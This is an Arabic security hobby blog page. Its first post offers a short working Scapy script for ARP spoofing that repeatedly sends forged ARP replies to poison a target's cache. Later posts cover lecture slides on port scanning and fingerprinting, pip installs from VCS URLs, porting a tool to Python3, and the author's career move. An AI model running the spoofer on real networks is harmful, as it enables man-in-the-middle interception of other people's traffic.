سكربت بسيط لعمل ARP Spoofing

سكربت بسيط لعمل ARP Spoofing … قم بنسخ الكود وتشغيله او تحميله من صفحة المشاريع (هنا) …

#!/usr/bin/env python
import sys, time
from scapy.all import sendp, ARP, Ether

if len (sys.argv) < 4:
	print "Usage\n:"
	print sys.argv[0] + "   "
	print "./arpSpoofer.py eth0 192.168.1.56 192.168.1.100"	
	sys.exit (1)

networkInterface = str(sys.argv[1])
targetIPAddr = sys.argv[2]
spoofedIPAddr = sys.argv[3]

# Assembling the Spoofed Packet
spoofedPacket = Ether() / ARP(pdst=targetIPAddr, psrc=spoofedIPAddr, op="is-at")

# Start Spoofing (aka Poisoning) :)
while True:
	sendp(spoofedPacket, iface=networkInterface)
	time.sleep (1)

المزيد من التجارب في الطريق إن شاء الله :)

الجزء الرابع من محاضرات HTID

لقد نسيت أمر رفع المحاضرات بصراحة بسبب الإنشغال … على كل حال هذا الجزء يشمل الأقسام التالية:
Port Scanning
Fingerprinting
Packet Crafting

هناك مستندات مفيدة آخرى تخص:
– شركات تصنيع أجهزة الشبكات
– أهم مواقع التواصل الإجتماعي
– أهم المؤتمرات والندوات العالمية في مجال أمن المعلومات

سأقوم بإضافتهم الى صفحة المحاضرات قريباً … على كل حال جميع المحاضرات تجدونها هنا

بالتوفيق للجميع …


Installing Python Packages from a URL using PIP

بعض الأحيان لربما تحتاج الى تنصيب مكتبة من مكتبات Python ولكن ليست موجودة في PyPI أو إن الموجود هناك في المكتبة لا يعمل أو قديم لم يتم تحديثه الى آخره من الأسباب … كل ما عليك فعله هو أن تحدد نوع الـ version control system الذي تستعمله تلك المكتبة … مثلاً مكتبة Scapy تستعمل Mercurial ولهذا لتنصيب مكتبة Scapy بواسطة pip يمكنك عمل التالي:

pip install hg+http://hg.secdev.org/scapy

ملاحظة: إذا ظهر لك خطأ بإنه لا يستطيع التعرف على الخيار hg؟ فكل ما عليك فعله هو تنصيب Mercurial

في حالة كنت تقوم بالتنصيب من Version Control مثل GIT أو SVN أو Bazaar فكل ما عليك فعله هو إستعمال المتغييرات المناسبة وهي كالتالي:

svn+URL, git+URL, hg+URL or bzr+URL

وأظن واضحة كل واحدة تعني ماذا … وقبل أن أنسى: عليكم بالـ virtualenv :)

للنقاش

محاولة نقل طارق للعمل على Python3

السلام عليكم ورحمة الله وبركاته

أقوم حالياً بمحاولة نقل طارق للعمل من Python2x الى Python3 وأتمنى إن كان هناك من يستطيع أن يقوم بعمل تجارب معي حول ذلك … لقد قمت بتصحيح الكود ليتوافق مع Python3 ولكن هناك مشاكل صراحة … أول هذه المشاكل هي إنه scapy الذي يعتمد عليه طارق لا يعمل على Python3 وبالتالي عليك أن تعدل على Path للبايثون وتضيف له المسار الموجود فيه الموديول scapy … يمكن عمل ذلك بواسطة:

import sys
sys.path.append('/usr/lib/python2.6')
sys.path.append('/usr/lib/pymodules/python2.6')
sys.path.append('/usr/local/lib/python2.6/dist-packages')
import scapy

غير ذلك سوف تحصل على رسالة خطأ إنه الموديول غير موجود … لا أريد أن أضع التعديل في الكود الرسمي الآن وأقصد تعديل عملية الـ import ولكن الكود الجديد لطارق موجود وبالإمكان عمل checkout له مباشرة من موقع طارق … كذلك هناك مشاكل عدة في الموديول StringIO أحتاج الى إصلاحها …
Continue reading

الإنتقال للعمل الآكاديمي

رغم إن تركي العملي التقني وإنتقالي الى العمل الآكاديمي ليس بجديد، خاصة عن الأهل والأصدقاء المقربين جداً، ولكن رغبت في تدوين الأمر هنا كما أعتدت على تدوين كل ما يدور معي … منذ أن أنهيت رسالة الدكتوراه في العام الماضي 2010 والسؤال نفسه يُطرح أمامي: هل أنتقل للعمل الآكاديمي أم أستمر في العمل التقني؟ والدي بالتحديد أول من شجعني على التحول الى العمل الآكاديمي وهو من طلب مني الحصول على الشهادة من الأساس، لكني لم أكن مستقر صدقاً على جواب … كذلك الأهل والكثير من الأقارب نصحوني بالأمر ومع هذا بدون جواب … بعض الأصدقاء كذلك كان لهم رأي في الإنتقال، منهم من أيد ذلك، ومنهم من يعشق التقنية مثلي لم يشجعني … وعلى هذه الحالة إستمرت الحياة والفكرة تدور في خاطري، ربما على الأقل كل يوم مرة! وفي أثناء هذه الأحداث أنتقلت من عمل الى عمل آخر برتبة Technical Manager ولكن للأمانة لم أستمر فيه كثيراً … بل تركت العمل فيها بعد شهرين لأسباب خاصة … أثناء هذه الفترة عُرضت علي وظيفتين في جامعتين مختلفتين … ترددت في قبولي أحد العروض أو رفضها، وهنا جاء دور والدي (الله يحفظه ويوفقه ويعطيه الصحة والعافية) مرة أخرى في قبول أحد العروض … وهكذا وافقت على إحدى العروض ولله الحمد … الجميل في الأمر كله، هو إن العروض جائت بناءاً على سيرتي الذاتية في المجال التقني :)
Continue reading

Pages: 1 2 Next